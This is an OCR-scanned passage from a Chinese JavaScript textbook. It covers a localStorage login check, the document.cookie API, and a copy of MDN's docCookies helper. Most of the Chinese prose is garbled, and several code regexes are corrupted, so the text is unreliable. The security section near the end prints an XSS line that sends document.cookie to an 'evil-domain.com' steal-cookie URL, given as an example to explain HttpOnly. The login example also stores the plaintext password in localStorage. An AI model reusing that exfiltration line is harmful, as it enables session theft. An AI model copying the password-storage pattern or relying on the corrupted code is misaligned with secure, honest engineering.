TR BERE B SR RS BB /N A Sl 399 TP B8 1 O S ) U /N ik 9 TR T
[Ea) B3 T A 2 L 8 S A ROF SRV P s I, A P 8 SR 2 0 T P oR 5 5, T
V7 TR o] G TR AR AR A P P R85 S O 1% S DT o ) AR A R R A 3-28 T
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—=| ifj[nlogin.html

B E

index.html

Y 2.
L

P 3-28 ik Uy [l A ER B9 U AR

TE B2 AT, LB login, html 3543, 76 % 5 s 2 i, X localStorage 18 il — 4~
a9 ] 4 B R L AR RS AT .

// X} localStorage 1B Jiil— A~k I s [|] (14 s [ 28
form. addEventListener( 'submit', function(e) {
/]
/70 R AR AR B g, WPKE P (S B R AEAS Hh 22 A7 h
alert( & EmI")
/145 W5 1 % 1 £ A% 7E TSON Xif 4

var userInfo = ({

username:username,
password: password,
/ /4 3o 5T R] 5 A 2 TR (] 79 30min f5
expire:new Date().getTime() + 1000 * 60 * 30
}
/7% R P B ARA7F localStorage H7, 3X HL TG 2 Fi] JSON. stringify() LA B 1k R A7 B K48
//7% [ object Object]
localStorage. setItem( 'userInfo', JSON. stringify(userInfo))
}, false)

TE Y login. html fl index. html R 2 A9 H 3 F 218 check-login. js 3¢, I AFFR
Lo BRI A R 1

//%5 3 2 3.5.4 f£ 5 login. html Fl index. html [7] %% % H 5% T A &t check — login. js 3L,
/735 M AR BR A 56 1) 38 %
/71 W7 2 i P R A R SR
function isLogin( ) {
/3R B 3t A7 it v 6 P A R
var userInfo = JSON. parse(localStorage.getItem( 'userInfo'))
[/ RS, WAR R AR 5 5

if(userInfo == null)({
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return false

}

/ /3R B i A ]

var now = new Date().getTime()

/73 AE ] A S L 40 e ) 0 T 25 i TR], U4 R
if (now > userInfo. expire) {

return false

}
/A AE GRS B SR
return true

}

/1R BN Y g A 44 R

var pageName = location.pathname

/RIS SRS

var login = isLogin()

/735 2 i 1 7] % 5% DU TH

if (pageName. indexOf ( 'login. html')!= — 1){
/735 BB SR, WTE AR, B sh Bk 3 i
if(login) {

location. href = 'index. html'

}
/73 TR E
}else if(pageName. indexOf ( 'index. html')!= —1){
/1735 AR 5%, W) B 3Bk e 3] 8 5% v
if(!login) {
location. href = 'login. html'

1
}

1£ login. html 5 index. html 34 H 3B % check-login. js F5] T RS0 T .

<!—— %% 3% 3.5.4 7f login. html 5 index. html {4 H1 38 il %F check — login. s MBI ——>
<!—— JiBAE login. html A ZFE index. html H1, 5| Fij check — login. js B {C A% #B 2 B 78 \L 5 A0S |
¥ —-—>

< script src = "check — login. js"></script >

< script >

/7P BT A 55 AR A
</script >
U R A T AR S B8 sk I B RS TR U [A] index. heml BT, DU o0 N6 2% K 25 A
gk 2 login, html, 7 T SRE T Uil login, html, WY 25 2 F g Bk #% 2] index.
html BT,

3.5.5 Cookie ¥} % i

HTTPCookie(1Y Web Cookie 33 % #§ Cookie) 42 IR 45 8 4 125 ) P W U0 £8 3 (- 17
TEAS Hb 1) /0 ’éﬂz%}% W28 2 7% Cookie FH7E T WK )[R — IRk 55 % 15 YK & 2 1 oK 1 485 47 I
KILBIIR S5 o b WE T T FIR 55 e v P AN R 15k [ R — 20 S g L AR
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BORIRAS . Cookie i T IARES K HTTP g ka2 MRS 5 B A AT RE .

Cookie EZHFFLIF 3 NJri .

(1) 2R B A0 P 85 ORI W 42 0 3R 20 B AR 5 ZD R R R .

(2) DHEABE : P A LBE A H AR E

(3) WYE &7 R BRI . QnERER AT P AT A

Cookie 8 — B H] 7% 1 3 BCHE 0 774, DR 24 60 O 347 Al 5 368 1) A Ak 90 125 10 A Sy Wi —
WY FEAE T B, (0 BLAE HE 720 AR A4 APL. B TR 55 @5 45 & Cookie J& , W Y2 4% 19 B 03
KA Cookie Bl , BT Lh 23y R /b 1Y PR RE T 85 OU H R TER S BREE T ) . Bl b8
API & & oV T Kk 3 B 12 4% B0 95 A7 it 3 45 M, i 1] Web Storage API(localStorage Fil
sessionStorage) 2¥ IndexedDB,

1. document. cookie HJiE 8 A &

TER P i AE Cookie 3T ] LIl FH document. cookie SEHE ., document. cookie F T3k
O 8 5 Y R SRS AR GRS Cookies AT LIHEE M B — 4™ getter and setter,

BRI A R F AL E D7) B Cookie, fURS AT -

var allCookies = document. cookie;

fE b ARG b allCookies MR AE A — A~ F4F B 2 FAF B A& A 19 Cookie, B 4%
Cookie LLJ35 Fl2s #% 43 b b - (4]
B —A Cookie B ZE M|, (CABANTF .

document. cookie = newCookie;

newCookie J&—ME-EXE X F A7, T2 EE R, XM I iE—
Cookie #1715 # B .

PLF AT #E R Cookie J& 1 (B AT DA SR AE S8 (B X 5, FH R HARAL XT Cookie #4715 28 /TH 7 »
{8 535 647 53 B

(1) spath=path (40 /', '/mydir") G0HBA & X, WERIA R 2 1 SR B A B A2 .

(2) ;domain=domain (|4l 'example. com', 'subdomain. example. com") R EF E
SC TNUERIA Ry 2SI SR A B Y PR AR 1 B R A . 5 R RV R S Y 2 T B4 TR N S A
CORE S AL PR T U SRV S HE A U X FE Y Cookie, QRAEE T W) Tl
FETEN .

(3) ;max-age= max-age-in-seconds (ffi]{1—4EK 60X 60X 24X 365),

(4) ; expires = date-in-GMTString-format IR % FH F X, Cookie M| £x 7E Nt 415 45 78 i

(5) ;secure (Cookie Hifiid https Uhil{&Hi) .

Cookie M1H F 47 & 7] A Al encodeURIComponent O - IEE A ALS AL ME 5 | 43 5 8§
23 K% (Cookie {H H A% (1 HIIX 261D .

W HBEXS —

N

=
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BT kRS H AN} Cookie #E4T A (1) fif B2 141
(1) X Cookie HEATHE T AR fij HL 241 AT
//%5 3 B 3.5.5 X Cookie HEAT IS A HY 1] 51 5% 4
document. cookie = "name = oeschger";

document. cookie = "favorite food = tripe";

alert(document. cookie);
// %7~ :name = oeschger; favorite food = tripe

(2) 3 IE N R Cookie H Y48 € BEMEL AAHS 40T

document. cookie = "testl = Hello";
document. cookie = "test2 = World";

var myCookie = document.cookie.replace(/(?:(?:"|. % ;\s* )test2\s* \=\s* ([*;]*). * $ )|

Sox s/, "8,

alert(myCookie) ;
// 7R :World

2. — 1 5EE X unicode B Cookie B/ 5 N\ 88

1B — A48 AL 1 E 45 B L Cookie FUME A B IR MERE [ AR MO AL B, T 0 09 P2 9 H 19 2
Wi E X — M Storage X 4 (en-US) # 7r — B M X 4 (docCookies) , fij ft document.
cookie MK HUT7 % IF 42 58 4 1Y Unicode S+, AABANTF .

//%5 3 % 3.5.5 fAj{k document. cookie [3K B 7 v I 42 L 55 4 1 Unicode 3% 4%

:: Cookies. js ::

A complete Cookies reader/writer framework with full unicode support.

|

[ * |

[ * |

[ * |

[ * |

| % | https://developer.mozilla. org/en — US/docs/DOM/document. cookie

|

| % | This framework is released under the GNU Public License, version 3 or later.
| % | http://www.gnu. org/licenses/gpl — 3.0 — standalone. html

[ = |

| % | Syntaxes

[ = |

| * | % docCookies. setItem(name, value[, end[, path[, domain[, secure]]]])
| * | % docCookies.getItem(name)

| * | % docCookies. removeltem(name[, path], domain)

| ¥ | * docCookies.hasItem(name)

| * | % docCookies.keys()

[ = |

\ %/

var docCookies = {
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getItem: function (sKey) {
return decodeURIComponent (document. cookie. replace(new RegExp (" (?:(?2:"]. *;)\\s* " +
encodeURIComponent (sKey) . replace(/[ — . + % 1/g, "\\ 8 &") + "\\s*x\\=\\s* ([*;]1%). % $)]|
fox M), "s1M)) || null;
iy
setItem: function (sKey, sValue, vEnd, sPath, sDomain, bSecure) {
if (! sKey || /" (?:expires| max\ — age| path| domain | secure) $ /i. test (sKey)) { return
false; }
var sExpires = "";
if (vEnd) {
switch (vEnd. constructor) {
case Number:

sExpires = vEnd === Infinity ? "; expires=Fri, 31 Dec 9999 23:59:59 GMT" : "; max —
age=" + vEnd;
break;
case String:
sExpires = "; expires=" + vEnd;
break;
case Date:
sExpires = "; expires=" + vEnd. toUTCString();
break;
}
}
document. cookie = encodeURIComponent (sKey) + " =" + encodeURIComponent (sValue) +
sExpires + (sDomain ? "; domain=" + sDomain : "") + (sPath? "; path=" + sPath : "") +
(bSecure ? "; secure" : "");
return true;
P
removeltem: function (sKey, sPath, sDomain) {
if (!sKey || !this. hasItem(sKey)) { return false; }
document. cookie = encodeURIComponent(sKey) + " =; expires = Thu, 01 Jan 1970 00:00:00
GMT" + ( sDomain ? "; domain=" + sDomain : "") + ( sPath? "; path=" + sPath : "");

return true;

t,
hasItem: function (sKey) {
return (new RegExp (" (?:"];\\s * )" + encodeURIComponent (sKey). replace(/[ —. + * 1/q,
"\\ s &") + "\\s*\\=")).test(document. cookie);
L
keys: / * optional method: you can safely remove it! * / function () {
var aKeys = document.cookie. replace(/((?:*[\s*;)[*"\=1+)(?2=;|8)[*\s* [\sx* (?:\=
[;1%)2(2:\1] $)/g, "").split(/\s* (?2:\=[";]1%)?;\sx%/);
for (var nIdx = 0; nIdx < aKeys. length; nIdx++) { aKeys[nIdx] = decodeURIComponent(aKeys
[nIdx]); }
return aKeys;
}
};

HEZRACAS S A Cookie HYTHE % (B 8 35— 1> Cookie) UM HNT
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docCookies. setItem(name, value[, end[, path[, domain[, secure]]]])

5 A Cookie ML LS B S EUL AT,

(1) name(%) . BAIEEE %10 Cookie M4 F (string) ,

(2) value(E) . Cookie MJ{H (string) ,

(3) end(AJ i) ; TR KRAFEW R B (—4F 2 31536e3, K A I 1 Cookie A Infinity (en-
US)) , 8 1 WIS ] # GMTString (en-US)AE X E Date X4 5 IR BEAE L 1620
ZE R T B (number-A BRAY B Infinity (en-US)-string, Date object B; null) ,

(4) path(A[3%) . 40"/, '/mydir', WEARBA E S, WER I 22§ SCRY 7 8 1Y #% 72
(string or null) , 72 WA 250 by 26 X} B 4%

(5) domain (T &) : 4N 'example. com', '. example. com ' (5T A T %),
'subdomain. example. com"', 0B H & S, W BRI\ 4 2/ SCRY AL B AT AR 1 38k 4% S 4y
(string B{ null) .

(6) secure(AJi%): Cookie R&#f https f£%i (boolean B{ null).

HEALARAD 9 4R B Cookie BY 375 (12 HL— 1> Cookie, MR Cookie A 7E, Wi [H]
nulD ARES AT

docCookies. getItem(name) //name A Cookie H 5 44

HEZRACHS B RS BR Cookie HYTH 1 (IR — > Cookie) AU AITF .

docCookies. removeltem(name[, path], domain)

kR Cookie By IS EULHI T .

(1) name: BRBERAY Cookie 44 (string) ,

(2) path (AJ3E) . Fl4n '/, '/mydir', WREA E L, WERIA A 2 17 SR 7 Y B A
(string % null) , B 42 DA 20 R 46 5% 4%

(3) domain (A] &) : B 40 'example. com', '. example. com' (K FrE T %),
'subdomain. example. com', U5 B A & S, W BRIA A 24 A/ SCARY 0L B Y AR 10 38 44 58 43
(string B{ null),

HE AR A Hp B9 A Cookie (A A — 4~ Cookie J& A7) BTG 7L RIS U1 T .

/ /3R |8l — 4~ bool &, F LR JIl I & 7 #E
var boolean = docCookies. hasItem(name) //name A B A5 ) Cookie 44 (string)

HEZARIS A5 T4 Cookie 31 3 MY TE ARSI T .

/3R Bl —A~F5 4% BT 4 AT 2 Cookie fY%4H
docCookies. keys( )

IR S5 3 X HE SRACHH 9 2555 1 L 58 % b 2 T RE AR A 1 £ O 5 AR R
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/7% 3 % 3.5.5 GG X HE SR AURS B9 25 A LA, o8 4 s ST HE R AT T s 5X

docCookies.
docCookies.
docCookies.
docCookies.
docCookies.
docCookies.
docCookies.
docCookies.
docCookies.
docCookies.
docCookies.

setItem("test0", "Hello world!");
setItem("testl", "Unicode test: \uOOEO\uOOE8\uOOEC\uOO0F2\u00F9", Infinity);
setItem("test2", "Hello world!", new Date(2020, 5, 12));
setItem("test3", "Hello world!", new Date(2027, 2, 3), "/blog");
setItem("test4", "Hello world!", "Sun, 06 Nov 2022 21:43:15 GMT");
setItem("test5", "Hello world!", "Tue, 06 Dec 2022 13:11:07 GMT", "/home");
setItem("test6", "Hello world!", 150);
setItem("test7", "Hello world!", 245, "/content");
setItem("test8", "Hello world!", null, null, "example.com");
setItem("test9", "Hello world!", null, null, null, true);

(

setItem("testl; =", "Safe character test; =", Infinity);

alert(docCookies.keys().join("\n"));
alert(docCookies. getItem("testl"));
alert(docCookies. getTtem("test5"));

docCookies.
docCookies.

removeltem("testl");
removeltem("test5", "/home");

alert(docCookies. getItem("testl"));
alert(docCookies. getItem("test5"));

alert

( (

(docCookies. getItem(
alert(docCookies. getItem());

( (

unexistingCookie"));

alert(docCookies. getItem("testl; ="));

3. cookie By & £ a1 7R

I A28 BR 3 I A BE BHL 1k M He At 4 42375 [7] Cookie., i FH ff 2 () DOM BJ o] 4% 5 3t 8 3k FR il
() an B 2 — A4~ 38 1) BR ) #5642 19 L Bt 19 iframe, X J5 145 8] H: contentDocument. cookie J&
PE) . -9 Cookie AN AR 2 17 ] A ME— J7 ¥R J2 4 & UAE I — DA% / 738044 28 A AT [R] 8
TR M A A7 A Bl B

Web Jif HIF2 73 ff ] Cookie R bn PR 7 B 4 B AT 9 %6 s 23 1l PR kG il ot 53 Wy i
46 Cookie, AT ASIHF B sk I P 1 2376 . B W Cookie MY UL 7 v& AL 45 #1 25 T F2 Al XSS
Bk ARSI E

(new Image()).src = "http://www.evil — domain. com/steal — Cookie. php?Cookie =" + document.

cookie;

HttpOnly J& ¥ 7] PLBH 1138 33 JavaScript ¥ 1] Cookie, M 1fi — & 2 & 1 18 Hl X 2 1 ik
HoAth 3 F Cookie I K 7F 5 T A9 HTTP Phl 251 K 4% 2 e vp ik — 24 76 .



